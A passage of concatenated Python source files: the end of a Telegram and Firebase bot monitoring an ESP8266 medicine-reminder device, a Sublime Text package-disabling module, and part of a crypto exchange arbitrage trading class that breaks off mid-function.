updater.dispatcher.add_handler(CommandHandler('start', start, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('showlog', showLog, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('update', updatetimings, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('pirlog', pirLog, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(CommandHandler('index', indexKeyHelp, filters = Filters.user(user_id = int(userId))))
updater.dispatcher.add_handler(MessageHandler(Filters.text, unknown))
updater.dispatcher.add_handler(MessageHandler(Filters.command, unknown)) # Filters out unknown commands
updater.dispatcher.add_handler(MessageHandler(Filters.text, unknown_text))
updater.start_polling()
def deviceOffline(startTime):
OfflineStatus = db.child("Offline").get().val()
if(not OfflineStatus == 1): # if device is not offline
deviceTime = db.child("time").get().val() # checking device time
if(OfflineStatus == 2): # device just started
sendToTelegram('Device online at ' + startTime)
db.child().update({"Offline" : 0})
H1, M1, S1 = map(int, deviceTime.split(":"))
timeDiff = datetime.now() - timedelta(hours = H1, minutes = M1, seconds = S1)
S = int(str(timeDiff).split()[1].split(':')[-2].split('.')[0])
H, M = map(int, str(timeDiff).split()[1].split(':')[:2])
t = timedelta(hours = H, minutes = M, seconds = S)
print(datetime.now(), H, M, S, t, t.total_seconds())
min = t.total_seconds() / 60
if(min >= 2 and min <= 10):
sendToTelegram("Device offline, Please check and connect ASAP\n Last seen at " + deviceTime)
db.child().update({"Offline" : 1})
def motionDetection(date):
tempPirCount = db.child("tempPirCount").get().val()
deviceTime = db.child("time").get().val()
#time = str(datetime.now()).split()[1][:5]
h = int(deviceTime.split(':')[0])
count = db.child("pirStatus").child(date).child(h).get().val()
if(count == 0):
tempPirCount = 0
tempPirCount += 1
db.child("pirStatus").child(date).update({h : tempPirCount})
db.child().update({"tempPirCount" : tempPirCount})
def getDay(s):
return int(s.split()[0])
def getMonth(s):
return s.split()[1]
def getNextDate(date):
months = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
m = months.index(date.split()[1])
nextD = str(datetime(int(date.split()[-1]), m + 1, int(date.split()[0])) + timedelta(days = 1))
nexty = nextD.split()[0].split('-')[0]
nextm = nextD.split()[0].split('-')[1]
nextd = nextD.split()[0].split('-')[2]
return nextd + ' ' + months[int(nextm) - 1] + ' ' + nexty
def checkStatus():
while(True):
timeNow = str(datetime.now()).split()[1][:5]
H = int(timeNow.split(":")[0])
M = int(timeNow.split(":")[1])
pirst = db.child("pirTstatus").get().val()
if(H == 7):
if(pirst == -1):
log = db.child("pirStatus").child(date).get().val()
if(log != None):
sendToTelegram(str(json.dumps(log, indent=4)))
db.update({"pirTstatus": 1})
else:
db.update({"pirTstatus": -1})
SOS = db.child("SOS").get().val()
pirStatus = db.child("PIR").get().val()
startTime = db.child("startTime").get().val()
firebaseStatusInNode = db.child("status").get().val()
status = db.child("time").get().val()
currentTime = str(datetime.now()).split()[-1][:5]
date = db.child("date").get().val()
morningTelegramAlert = db.child(date).child(3).get().val()
afternoonTelegramAlert = db.child(date).child(4).get().val()
nightTelegramAlert = db.child(date).child(5).get().val()
firebaseKeys = db.child().get()
dict_keys = list(firebaseKeys.val().keys())
if(H == 0 and (M >= 0 and M <= 5)):
db.child("pirStatus").update({getNextDate(date) : [0] * 24})
for key in dict_keys:
if(len(key.split()[-1]) == 4 and len(key.split()) == 3):
currentDay = getDay(date)
currentMonth = getMonth(date)
keyDate = getDay(key)
keyMonth = getMonth(key)
if(currentDay - keyDate >= 3 and currentMonth == keyMonth):
db.child(key).remove()
elif (currentMonth != keyMonth and currentDay >= 3):
db.child(key).remove()
pirStatusKeys = db.child("pirStatus").get()
dict_keys = list(pirStatusKeys.val().keys())
for key in dict_keys:
if(len(key.split()[-1]) == 4 and len(key.split()) == 3):
currentDay = getDay(date)
currentMonth = getMonth(date)
keyDate = getDay(key)
keyMonth = getMonth(key)
if(currentDay - keyDate >= 3 and currentMonth == keyMonth):
db.child("pirStatus").child(key).remove()
elif (currentMonth != keyMonth and currentDay >= 3):
db.child("pirStatus").child(key).remove()
deviceOffline(startTime)
if(pirStatus):
motionDetection(date)
db.update({"PIR": False})
if(firebaseStatusInNode == 404):
sendToTelegram("Firebase error in NodeMCU")
db.update({"status": 0})
if(SOS):
sendToTelegram("Got an SOS alert from Food and Medicine Remainder using ESP8266")
db.update({"SOS": False})
if(morningTelegramAlert == 2):
sendToTelegram("Missed morning tablets")
db.child(date).update({3 : -1})
if(afternoonTelegramAlert == 2):
sendToTelegram("Missed afternoon tablets")
db.child(date).update({4 : -1})
if(nightTelegramAlert == 2):
sendToTelegram("Missed night tablets")
db.child(date).update({5 : -1})
if(morningTelegramAlert == 1):
t = db.child(date).child(6).get().val()
sendToTelegram("Took morning tablets at " + t)
db.child(date).update({3 : -1})
if(afternoonTelegramAlert == 1):
t = db.child(date).child(7).get().val()
sendToTelegram("Took afternoon tablets at " + t)
db.child(date).update({4 : -1})
if(nightTelegramAlert == 1):
t = db.child(date).child(8).get().val()
sendToTelegram("Took night tablets at " + t)
db.child(date).update({5 : -1})
time.sleep(5)
if __name__ == '__main__':
try:
t1 = threading.Thread(target = checkStatus)
t1.start()
except Exception as e:
print(str(e))
telegramBotInit()
|
package_disabler.py
|
import json
import threading
import sublime
import os
import time
import random
from . import text
from . import settings as g_settings
from .console_write import console_write
from .package_io import package_file_exists, read_package_file
from .settings import preferences_filename, pc_settings_filename, load_list_setting, save_list_setting
# This has to be imported this way for consistency with the public API,
# otherwise this code and packages will each load a different instance of the
# module, and the event tracking won't work. However, upon initial install,
# when running ST3, the module will not yet be imported, and the cwd will not
# be Packages/PackagesManager/ so we need to patch it into sys.modules.
try:
from package_control import events
except (ImportError):
events = None
class PackageDisabler():
old_color_scheme_package = None
old_color_scheme = None
old_theme_package = None
old_theme = None
old_syntaxes = {}
old_color_schemes = {}
def __init__(self):
self.pc_settings = sublime.load_settings(pc_settings_filename())
self.debug = self.pc_settings.get('debug')
# self.debug = True
def get_version(self, package):
"""
Gets the current version of a package
:param package:
The name of the package
:return:
The string version
"""
if package_file_exists(package, 'package-metadata.json'):
metadata_json = read_package_file(package, 'package-metadata.json')
if metadata_json:
try:
return json.loads(metadata_json).get('version', 'unknown version')
except (ValueError):
pass
return 'unknown version'
def disable_packages(self, packages, operation_type='upgrade'):
"""
Disables one or more packages before installing or upgrading to prevent
errors where Sublime Text tries to read files that no longer exist, or
read a half-written file.
:param packages:
The string package name, or an array of strings
:param operation_type:
The type of operation that caused the package to be disabled:
- "upgrade"
- "remove"
- "install"
- "disable"
- "loader"
:return:
A list of package names that were disabled
"""
if self.debug: console_write(u'Calling disable_packages() with: %s, type: %s', (packages, operation_type))
_operation_type = ( lambda package_name: operation_type ) if not hasattr( operation_type, "__call__" ) else operation_type
if not packages:
console_write( u'No packages to process by reenable_package!' )
return []
if not isinstance(threading.current_thread(), threading._MainThread):
raise RuntimeError('disable_packages called on a background thread')
global events
try:
from PackagesManager.package_control import events
except (ImportError):
events = None
console_write( u'Warning: Could not run packages events, if any event was scheduled!' )
if not isinstance(packages, list):
packages = [packages]
in_process = []
settings = sublime.load_settings(preferences_filename())
PackageDisabler.old_color_scheme_package = None
PackageDisabler.old_color_scheme = None
PackageDisabler.old_theme_package = None
PackageDisabler.old_theme = None
for package in packages:
operation = _operation_type(package)
if events and operation in ['upgrade', 'remove']:
version = self.get_version(package)
tracker_type = 'pre_upgrade' if operation == 'upgrade' else operation
events.add(tracker_type, package, version)
global_color_scheme = settings.get('color_scheme')
if global_color_scheme is not None and global_color_scheme.find('Packages/' + package + '/') != -1:
PackageDisabler.old_color_scheme_package = package
PackageDisabler.old_color_scheme = global_color_scheme
settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
for window in sublime.windows():
for view in window.views():
view_settings = view.settings()
syntax = view_settings.get('syntax')
if syntax is not None and syntax.find('Packages/' + package + '/') != -1:
if package not in PackageDisabler.old_syntaxes:
PackageDisabler.old_syntaxes[package] = []
PackageDisabler.old_syntaxes[package].append([view, syntax])
view_settings.set('syntax', 'Packages/Text/Plain text.tmLanguage')
# Handle view-specific color_scheme settings not already taken care
# of by resetting the global color_scheme above
scheme = view_settings.get('color_scheme')
if scheme is not None and scheme != global_color_scheme \
and scheme.find('Packages/' + package + '/') != -1:
if package not in PackageDisabler.old_color_schemes:
PackageDisabler.old_color_schemes[package] = []
PackageDisabler.old_color_schemes[package].append([view, scheme])
view_settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')
# Change the theme before disabling the package containing it
if package_file_exists(package, settings.get('theme')):
PackageDisabler.old_theme_package = package
PackageDisabler.old_theme = settings.get('theme')
settings.set('theme', 'Default.sublime-theme')
# We don't mark a package as in-process when disabling it, otherwise
# it automatically gets re-enabled the next time Sublime Text starts
if operation != 'disable':
in_process.append( package )
# Force Sublime Text to understand the package is to be ignored
self._force_setting( self._force_add, 'in_process_packages', in_process, g_settings.packagesmanager_setting_path() )
disabled_packages = []
to_disable = list( packages )
while len( to_disable ) > 0:
MAXIMUM_TO_REENABLE = 10
effectively_added = self._force_setting( self._force_add, 'ignored_packages', to_disable[:MAXIMUM_TO_REENABLE] )
disabled_packages.extend( effectively_added )
to_disable = to_disable[MAXIMUM_TO_REENABLE:]
return disabled_packages
def reenable_package(self, packages, operation_type='upgrade'):
"""
Re-enables a package(s) after it has been installed or upgraded
:param packages:
The string packages name or a list of packages name
:param operation_type:
The type of operation that caused the packages to be re-enabled:
- "upgrade"
- "remove"
- "install"
- "enable"
- "loader"
"""
if self.debug: console_write(u'Calling reenable_package() with: %s, type: %s', (packages, operation_type))
if isinstance( packages, str ): packages = [packages]
_operation_type = ( lambda package_name: operation_type ) if not hasattr( operation_type, "__call__" ) else operation_type
if not packages:
console_write( u'No packages to process by reenable_package!' )
return
if not isinstance(threading.current_thread(), threading._MainThread):
raise RuntimeError('reenable_package called on a background thread')
global events
try:
from PackagesManager.package_control import events
except (ImportError):
events = None
console_write( u'Warning: Could not run packages events, if any event was scheduled!' )
settings = sublime.load_settings(preferences_filename())
ignored = load_list_setting(settings, 'ignored_packages')
if events:
for package in packages:
operation = _operation_type( package )
if package in ignored:
if operation in ['install', 'upgrade']:
version = self.get_version(package)
tracker_type = 'post_upgrade' if operation == 'upgrade' else operation
events.add(tracker_type, package, version)
events.clear(tracker_type, package, future=True)
if operation == 'upgrade':
events.clear('pre_upgrade', package)
elif operation == 'remove':
events.clear('remove', package)
# Force Sublime Text to understand the package is to be unignored
to_enable = list( packages )
while len( to_enable ) > 0:
MAXIMUM_TO_REENABLE = 10
self._force_setting( self._force_remove, 'ignored_packages', to_enable[:MAXIMUM_TO_REENABLE] )
to_enable = to_enable[MAXIMUM_TO_REENABLE:]
for package in packages:
operation = _operation_type( package )
if self.debug: console_write( u'operation: %s, _operation_type: %s', (operation, _operation_type) )
if package in ignored:
corruption_notice = u' You may see some graphical corruption until you restart Sublime Text.'
if operation == 'remove' and PackageDisabler.old_theme_package == package:
message = text.format(u'''
PackagesManager
The package containing your active theme was just removed
and the Default theme was enabled in its place.
''')
if int(sublime.version()) < 3106:
message += corruption_notice
sublime.message_dialog(message)
# By delaying the restore, we give Sublime Text some time to
# re-enable the package, making errors less likely
def delayed_settings_restore():
syntax_errors = set()
color_scheme_errors = set()
if PackageDisabler.old_syntaxes is None:
PackageDisabler.old_syntaxes = {}
if PackageDisabler.old_color_schemes is None:
PackageDisabler.old_color_schemes = {}
if operation == 'upgrade' and package in PackageDisabler.old_syntaxes:
for view_syntax in PackageDisabler.old_syntaxes[package]:
view, syntax = view_syntax
if resource_exists(syntax):
view.settings().set('syntax', syntax)
elif syntax not in syntax_errors:
console_write(u'The syntax "%s" no longer exists' % syntax)
syntax_errors.add(syntax)
if self.debug: console_write( "PackageDisabler.old_color_scheme_package: %s, \n"
"PackageDisabler.old_theme_package: %s, \n"
"PackageDisabler.old_color_schemes: %s, \n"
"package: %s",
(PackageDisabler.old_color_scheme_package,
PackageDisabler.old_theme_package,
PackageDisabler.old_color_schemes,
package) )
if operation == 'upgrade' and PackageDisabler.old_color_scheme_package == package:
if resource_exists(PackageDisabler.old_color_scheme):
settings.set('color_scheme', PackageDisabler.old_color_scheme)
else:
color_scheme_errors.add(PackageDisabler.old_color_scheme)
sublime.error_message(text.format(
u'''
PackagesManager
The package containing your active color scheme was
just upgraded, however the .tmTheme file no longer
exists. Sublime Text has been configured use the
default color scheme instead.
'''
))
if operation == 'upgrade' and package in PackageDisabler.old_color_schemes:
for view_scheme in PackageDisabler.old_color_schemes[package]:
view, scheme = view_scheme
if resource_exists(scheme):
view.settings().set('color_scheme', scheme)
elif scheme not in color_scheme_errors:
console_write(u'The color scheme "%s" no longer exists' % scheme)
color_scheme_errors.add(scheme)
if operation == 'upgrade' and PackageDisabler.old_theme_package == package:
if package_file_exists(package, PackageDisabler.old_theme):
settings.set('theme', PackageDisabler.old_theme)
message = text.format(u'''
PackagesManager
The package containing your active theme was just
upgraded.
''')
if int(sublime.version()) < 3106:
message += corruption_notice
sublime.message_dialog(message)
else:
sublime.error_message(text.format(
u'''
PackagesManager
The package containing your active theme was just
upgraded, however the .sublime-theme file no longer
exists. Sublime Text has been configured use the
default theme instead.
'''
))
sublime.save_settings(preferences_filename())
sublime.set_timeout(delayed_settings_restore, 1000)
threading.Thread(target=self._delayed_in_progress_removal, args=(packages,)).start()
def _delayed_in_progress_removal(self, packages):
sleep_delay = 5 + random.randint( 0, 10 )
packages = list( packages )
to_remove = []
console_write( "After %s seconds sleep, it will finish the packages changes: %s", ( sleep_delay, packages ) )
time.sleep( sleep_delay )
settings = sublime.load_settings( preferences_filename() )
ignored = load_list_setting( settings, 'ignored_packages' )
for package in packages:
if package in ignored:
console_write( "The package %s should not be in your User ignored_packages "
"package settings, after %d seconds.", ( package, sleep_delay ) )
else:
to_remove.append( package )
console_write( "After randomly %s seconds delay, finishing the packages changes: %s", ( sleep_delay, to_remove ) )
self._force_setting( self._force_remove, 'in_process_packages', to_remove, g_settings.packagesmanager_setting_path() )
def _force_setting(self, callback, *args, **kwargs):
return callback(*args, **kwargs)
def _force_add(self, setting_name, packages_to_add, full_setting_path=None):
"""
Keeps it running continually because something is setting it back. Flush just a few
items each time. Let the packages be unloaded by Sublime Text while ensuring anyone is
putting them back in.
Randomly reverting back the `ignored_packages` setting on batch operations
https://github.com/SublimeTextIssues/Core/issues/2132
"""
if not full_setting_path: full_setting_path = g_settings.sublime_setting_path()
packages_to_add.sort()
currently_ignored = g_settings.get_list_setting(setting_name, full_setting_path)
effectively_added = [package_name for package_name in packages_to_add if package_name not in currently_ignored]
if self.debug: console_write( "_force_rem, full_setting_path: %s", ( full_setting_path ) )
if self.debug: console_write( "_force_add, currently add packages: %s", ( currently_ignored ) )
if self.debug: console_write( "_force_add, adding the packages: %s", ( packages_to_add ) )
if self.debug: console_write( "_force_add, effectively added: %s", ( effectively_added ) )
g_settings.unique_list_append( currently_ignored, packages_to_add )
currently_ignored.sort()
console_write( "Processing %s add for the packages: %s", ( setting_name, effectively_added ) )
g_settings.set_list_setting( setting_name, currently_ignored, full_setting_path )
return effectively_added
def _force_remove(self, setting_name, packages_to_remove, full_setting_path=None):
"""
Keeps it running continually because something is setting it back. Flush just a few
items each time. Let the packages be unloaded by Sublime Text while ensuring anyone is
putting them back in.
Randomly reverting back the `ignored_packages` setting on batch operations
https://github.com/SublimeTextIssues/Core/issues/2132
"""
if not full_setting_path: full_setting_path = g_settings.sublime_setting_path()
packages_to_remove.sort()
currently_ignored = g_settings.get_list_setting(setting_name, full_setting_path)
effectively_added = [package_name for package_name in packages_to_remove if package_name in currently_ignored]
if self.debug: console_write( "_force_rem, full_setting_path: %s", ( full_setting_path ) )
if self.debug: console_write( "_force_rem, currently add packages: %s", ( currently_ignored ) )
if self.debug: console_write( "_force_rem, removing the packages: %s", ( packages_to_remove ) )
if self.debug: console_write( "_force_rem, effectively added: %s", ( effectively_added ) )
currently_ignored.sort()
currently_ignored = [package_name for package_name in currently_ignored if package_name not in packages_to_remove]
console_write( "Processing remove %s for the packages: %s", ( setting_name, effectively_added ) )
g_settings.set_list_setting( setting_name, currently_ignored, full_setting_path )
return effectively_added
def resource_exists(path):
"""
Checks to see if a file exists
:param path:
A unicode string of a resource path, e.g. Packages/Package Name/resource_name.ext
:return:
A bool if it exists
"""
if not path.startswith('Packages/'):
return False
parts = path[9:].split('/', 1)
if len(parts) != 2:
return False
package_name, relative_path = parts
return package_file_exists(package_name, relative_path)
|
algo_multilateral_arbitrage.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
general notation is formed as bid-ask.
first exchange is the bid side (sell on side) and the second is the ask side (buy on side)
"""
import os
import datetime
import uuid
import threading
import yaml
import numpy as np
import psycopg2
from multiprocessing.pool import ThreadPool
from typing import Dict, List, Tuple, Union
from prometheus_client import Summary
import quant_sdk as sdk
import src.helpers
import src.sql_queries
import src.buildblocks
from src import util
from src.data_types import Signal
from src.trading_algorithm import TradingAlgorithm
from src.algorithm_exception import IncorrectStateException
from src.order_status.order_status import OrderStatus, timeout_tag, order_sdk_tag, additional_info_tag
ORDER_RESPONSE_TIMES = Summary('execute_order_func_times', 'Time it takes to place both legs of an arbitrage trade.')
# TODO rename files for algorithms referencing the content e.g. arbitrage_algorithm.py
# This will enhance the traceback of logs
class ArbitrageInstance(TradingAlgorithm):
"""
Arbitrage instance
In simulation mode the instance will not place any trades and will not send any trades
everything else will be instantiated and will run as normal.
configs_file is a yaml file located in the working directory or anywhere when a file path is given.
"""
fee_map: Dict[str, float] = {} # contains the fees for all
exchanges: List[str]
currencies: List[str]
# todo generate from a default global threshold
# todo be able to modify specific combinations
threshold_map: Dict[str, Dict[str, float]] = {}
# every exchange has a designated threshold for every possible
# combination format {ex_1: {ex_2: thresh_1, ..., ex_n: thresh_n}, ..., ex_n: {ex_1: thresh_1, ...,
# ex_(n-1): thresh_(n-1)}}
lot_size: float
min_lot_size: float
base: str
quote: str
precision: float
fund_update_lock_period: float
slippage_buffer_bps: float
fund_buffer: float
funds: Dict[str, Dict[str, float]]
def __init__(
self,
algo_name,
client=None,
logger_wrapper: src.util.LoggerWrapper=None,
visualization=False,
update_order_sleep=10
):
super().__init__(
algo_name=algo_name,
client=client,
mode=src.helpers.DBMode.TEST,
open_db_connection=False,
logger_wrapper=logger_wrapper
)
self.visualization = visualization
self.logger_wrapper.logger.info("Constructor")
self.orders_observer = OrderStatus(
client=self.client,
mode=self.mode,
test=True,
logger_instance=self.logger_wrapper,
update_order_sleep=update_order_sleep
)
self.orders_observer_thread = threading.Thread(target=self.orders_observer.resolve_orders_threaded, args=())
self.orders_observer_thread.start()
def __del__(self):
# virtual destructor
self.orders_observer.disable_activity()
self.orders_observer_thread.join()
if self.orders_observer_thread.is_alive():
self.logger_wrapper.logger.error(f"Service open orders service thread failed to stop")
else:
del self.orders_observer
super(ArbitrageInstance, self).__del__()
def trade_algorithm(self):
for currency_pair in self.configuration["CURRENCY_PAIRS"]:
basic_points_for_currency = 10000 # this comes from db table
precision = 2 # this comes from db table
exchanges_associated_to_pair = self.currency_pair_exchange_association[currency_pair['symbol']]
order_books_raw = self.client.get_order_book(exchanges_associated_to_pair, currency_pair['code_base'], currency_pair["code_quote"], depth=50)
# check presence of arbitrage opportunity without fees
max_ask = max([order_book["asks"][0][0] for order_book in order_books_raw])
min_bid = min([order_book["bids"][0][0] for order_book in order_books_raw])
if max_ask > min_bid:
# opportunity for arbitrage exists
# calculation of maximal arbitrage opportunity for each exchange
opportunities = {}
for order_book in order_books_raw:
# extraction of fees
exchange = order_book['exchange']
asks_to_arbitrage = [order_item for order_item in order_book["asks"] if order_item[0] > min_bid]
bids_to_arbitrage = [order_item for order_item in order_book["bids"] if order_item[0] < max_ask]
volume_asks = sum([item[1] for item in asks_to_arbitrage])
price_asks = sum([item[1] * item[0] for item in asks_to_arbitrage])
volume_bids = sum([item[1] for item in bids_to_arbitrage])
price_bids = sum([item[1] * item[0] for item in bids_to_arbitrage])
opportunities[order_book['exchange']] = {'asks': [price_asks, volume_asks], 'bids': [price_bids, volume_bids]}
if self.visualization:
self.logger_wrapper.logger.info(f"Opportunities: {opportunities}")
src.helpers.visualize_order_book("Raw orderbooks", order_books_raw)
# construction of fully arbitraged order book
unarbitraged_order_book = self.deselect_orders_in_interval(order_books_raw, min_bid, max_ask)
src.helpers.visualize_order_book("Order books after full arbitrage", unarbitraged_order_book)
# additional checking/checking threshold
orders_to_execute = self.prepare_orders(opportunities, currency_pair, basic_points_for_currency, precision)
# check funds for trades
orders_to_be_executed = self.check_funds_for_trades(orders_to_execute)
# execute trades
executed_trades = self.execute_orders(orders_to_be_executed)
# check fulfillment of trades
#self.check_fulfillment_of_orders(executed_trades)
def log_executed_order(self, order_response, exchange):
query_to_execute = src.sql_queries.insert_into_order_log(
self.algo_id, exchange, order_response, self.logger_wrapper.logger
)
self.db_connector.execute_dml(query_to_execute)
@staticmethod
def deselect_orders_in_interval(order_books_raw, min_bid, max_ask):
# construction of fully arbitraged order book
unarbitraged_order_book = []
for order_book in order_books_raw:
asks_unable_to_arbitrage = [order_item for order_item in order_book["asks"] if order_item[0] <= min_bid]
bids_unable_to_arbitrage = [order_item for order_item in order_book["bids"] if order_item[0] >= max_ask]
exchange_order_book = {'exchange': order_book['exchange'], "asks": asks_unable_to_arbitrage, "bids": bids_unable_to_arbitrage}
unarbitraged_order_book.append(exchange_order_book)
return unarbitraged_order_book
def prepare_orders(self, opportunities, currency_pair, basic_points_for_currency, precision):
orders_to_execute = {}
for exchange, opportunity in opportunities.items():
fee_bid = self.fee_map[exchange]['BUY'] / basic_points_for_currency
fee_ask = self.fee_map[exchange]['SELL'] / basic_points_for_currency
orders_to_execute[exchange] = []
# TODO: taking into account latency
# calculate fees for transaction
order = {
"currency_pair": currency_pair,
"status": "in preparation",
"algo_id": self.algo_id,
"exchange_id": self.configuration['EXCHANGES'][exchange]["ID"]
}
if opportunity['asks'][1] > 0 and opportunity['bids'][1] > 0:
# exchange in the middle
average_direction_of_trade = np.mean([opportunity['asks'][1], -opportunity['bids'][1]])
# it can be improved
order.update({
"volume": util.round_down(abs(opportunity['asks'][1] if average_direction_of_trade > 0 else opportunity['bids'][1]), precision),
"price": (opportunity['asks'][0] if average_direction_of_trade > 0 else opportunity['bids'][0]),
"type": ('BUY' if average_direction_of_trade > 0 else 'SELL')
})
elif opportunity['asks'][1] > 0 and opportunity['bids'][1] == 0:
order.update({
"volume": util.round_down(abs(opportunity['asks'][1]), precision),
"price": opportunity['asks'][0],
"type": 'SELL',
"fees": opportunity['asks'][0] * fee_bid,
"currency_fee": currency_pair["code_quote"]
})
elif opportunity['bids'][1] > 0 and opportunity['asks'][1] == 0:
order.update({
"volume": util.round_down(abs(opportunity['bids'][1]), precision),
"price": opportunity['asks'][0],
"type": 'BUY',
"fees": opportunity['bids'][0] * fee_ask,
"currency_fee": currency_pair["code_base"]
})
elif opportunity['bids'][1] == 0 and opportunity['asks'][1] == 0:
# no opportunity detected
continue
else:
raise IncorrectStateException("Fundamental algorithm error!")
orders_to_execute[exchange].append(order)
self.logger_wrapper.logger.debug(f"New order prepared: {order}")
return orders_to_execute
def execute_orders(self, orders_to_be_executed):
executed_trades = []
for exchange, orders in orders_to_be_executed.items():
for order in orders:
currency_pair = order["currency_pair"]
response = self.client.place_order(
order_type=sdk.Client.MARKET_ORDER,
base=currency_pair["code_base"],
quote=currency_pair["code_quote"],
direction=(
sdk.Client.BUY if order["type"] == "BUY" else sdk.Client.SELL
),
quantity=order["volume"],
exchanges=exchange
)
order["status"] = "submitted"
self.current_order_id = response["order"]["order_id"]
executed_trades.append((response, order))
self.logger_wrapper.logger.debug(f"Order executed: {order}")
self.orders_observer.enqueue_order_thread(
{
timeout_tag: datetime.datetime.now() + datetime.timedelta(minutes=1),
order_sdk_tag: response,
additional_info_tag:{
"algo_id": order["algo_id"],
"exchange_id": order["exchange_id"]
}
})
return executed_trades
def check_fulfillment_of_orders(self, executed_trades):
for item in executed_trades:
response, order = item
status = self.client.order_status(response['order']['order_id'])
if status['trade_status'][0]['execution_status'] == 1:
order['status'] = 'finished'
# log data into DB
self.log_executed_order(status, response['exchanges'])
else:
# status of the order not finished
order['status'] = 'unfinished'
def check_funds_for_trades(self, orders_to_execute):
# check funds for trades
orders_to_be_executed = {}
for exchange, orders in orders_to_execute.items():
orders_to_be_executed[exchange] = []
for order in orders:
currency = order["currency_pair"]["code_quote"] if order["type"] == "BUY" else order["currency_pair"]["code_base"]
funds_in_appropriate_currency = self.funds[exchange][currency]
approximate_price = order["price"]
if funds_in_appropriate_currency * (1 - self.fund_buffer) < approximate_price:
# limiting volume
order["volume"] = (1 - self.fund_buffer) * order["volume"]
orders_to_be_executed[exchange].append(order)
return orders_to_be_executed
#########################################################
# Signal calculation and determination [A]
#########################################################
### Step A 1 ###
def get_modified_snapshots(self) -> Dict[str, Dict[str, Dict[str, float]]]:
"""
get the different order books and merge them
inputs:
None
return format
{
exchange_1: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
exchange_2: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
exchange_n: {bid: {price: vwap_price, volume: agg_volume}, ask: {price: vwap_price, volume: agg_volume}},
}
"""
vwap_order_books = {}
return vwap_order_books
### Step A 2 ###
def find_opportunities(self, order_books: Dict[str, Dict[str, Dict[str, float]]]) -> List[Signal]:
"""
inputs:
Takes the order_books format from get_modified_snapshots()
returns:
"""
signals: List[Signal] = []
for sell_ex in self.exchanges:
for buy_ex in self.exchanges:
if sell_ex == buy_ex:
continue
signal = self.extract_arbitrage_ops(order_books, sell_ex, buy_ex)
if signal is None:
continue
signals.append(signal)
return signals
### Step A 2.1 ###
def extract_arbitrage_ops(self, order_books: Dict[str, Dict[str, Dict[str, float]]], sell_ex, buy_ex) -> Union[
Signal, None]:
"""
inputs:
order_books is a subset of all order books which are being observed.
The subset focuses on two exchanges
returns:
"""
basic_points = 10000
signal = Signal()
signal.sell_exchange = sell_ex
signal.buy_exchange = buy_ex
if sell_ex not in order_books.keys():
logger.info(f"data for sell exchange [{sell_ex}] missing")
return
if buy_ex not in order_books.keys():
logger.info(f"data for buy exchange [{buy_ex}] missing")
return
book_bid = order_books[sell_ex]
book_ask = order_books[buy_ex]
fee_bid = self.fee_map[sell_ex] / basic_points
fee_ask = self.fee_map[buy_ex] / basic_points
bid_price = book_bid["bid"]["price"]
ask_price = book_ask["ask"]["price"]
spread = (((bid_price * (1 - fee_bid)) / (ask_price * (1 + fee_ask))) - 1) * basic_points
volume = min(book_bid["bid"]["volume"], book_ask["ask"]["volume"], self.lot_size)
volume = util.round_down(volume, self.precision)
signal.spread = spread
signal.volume = volume
signal.sell_price = bid_price
signal.buy_price = ask_price
return signal
### Step A 3.1 ###
def check_thresholds(self, signals: List[Signal]) -> List[Signal]:
"""Check thresholds"""
#
signals = [self._check_threshold(signal) for signal in signals]
# select only signals which meet the threshold
signals = [signal for signal in signals if signal.above_thresh]
return signals
### Step A 3.1.1 ###
def _check_threshold(self, signal: Signal):
"""check whether the spread is above the specified threshold for the combination"""
threshold = self.threshold_map[signal.sell_exchange][signal.buy_exchange]
if signal.spread >= threshold:
signal.above_thresh = True
else:
signal.above_thresh = False
return signal
### Step A 3.2 ###
def check_fund_availability(self, signals: List[Signal]) -> List[Signal]:
executable_signals: List[Signal] = []
for signal in signals:
buy_exchange_funds = self.funds[signal.buy_exchange][self.quote] # We use quote currency to buy
sell_exchange_funds = self.funds[signal.sell_exchange][self.base] # we use base currency for a sell
volume_base = signal.volume
volume_quote = signal.volume * signal.sell_price
if buy_exchange_funds - (volume_quote * self.fund_buffer) < 0:
continue
if sell_exchange_funds - (volume_base * self.fund_buffer) < 0:
continue
executable_signals.append(signal)
return executable_signals
### Step A 4 ###
def select_signals(self, signals: List[Signal]) -> List[Signal]:
"""chooses the trade which is the highest above it's threshold in relative terms:
(spread / threshold * volume)"""
current_lead: Tuple[float, Signal] = (0, signals[0])
for signal in signals:
threshold = self.threshold_map[signal.sell_exchange][signal.buy_exchange]
val = signal.spread / threshold * signal.volume
if val > current_lead[0]:
current_lead = (val, signal)
# kept as a list if the selection
return [current_lead[1]]
#########################################################
# Signal and trade execution [B]
#########################################################
### Step B 1 ###
def execute_arbitrage_signals(self, signals: List[Signal]):
threads = []
for signal in signals:
t = threading.Thread(target=self.execute_trade, kwargs={"signal": signal}, daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
### Step B 1.1 ###
def execute_trade(self, signal):
pool = ThreadPool(processes=2)
buy_exchange = signal.buy_exchange
sell_exchange = signal.sell_exchange
volume = signal.volume
start_time = util.unix_milli()
buy_thread = pool.apply_async(self.place_order, (), {
"order_type": sdk.Client.MARKET_ORDER,
'base': self.base,
'quote': self.quote,
'direction': sdk.Client.BUY,
'quantity': volume,
'exchanges': buy_exchange,
})
sell_thread = pool.apply_async(self.place_order, (), {
"order_type": sdk.Client.MARKET_ORDER,
'base': self.base,
'quote': self.quote,
'direction': sdk.Client.SELL,
'quantity': volume,
'exchanges': sell_exchange
})
buy_order = buy_thread.get()
sell_order = sell_thread.get()
end_time = util.unix_milli()
logger.info(f'Duration order placement: {round(end_time - start_time, 6)}ms')
logger.info(f'Buy: {buy_order}')
logger.info(f'Buy: {sell_order}')
t = threading.Thread(target=self.log_executions,
kwargs={"buy_order": buy_order, "sell_order": sell_order, "buy_exchange": buy_exchange,
"sell_exchange": sell_exchange})
t.start()
@ORDER_RESPONSE_TIMES.time()
def place_order(self, **kwargs):
"""
function created as a wrapper to time the order executions
